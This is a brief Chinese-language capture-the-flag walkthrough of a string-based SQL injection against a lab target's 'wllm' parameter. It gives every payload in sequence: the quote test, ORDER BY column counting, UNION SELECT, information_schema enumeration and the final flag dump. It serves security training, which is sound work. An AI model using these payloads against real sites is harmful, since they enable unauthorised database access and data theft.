1.启动靶机
查看得知回显为wllm,试输入?wllm=1,发现页面正常,输入wllm=1'发现报错,说明是字符型漏洞
直到输入?wllm=1’ order by 4--+报错
输入?wllm=-1' union select 1,2,3--+查看回显
?wllm=-1' union select 1,2,database()--+查询库名
输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表
再输入
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段
最后输入
-1' union select 1,2,group_concat(id,flag) from test_tb--+ 查询flag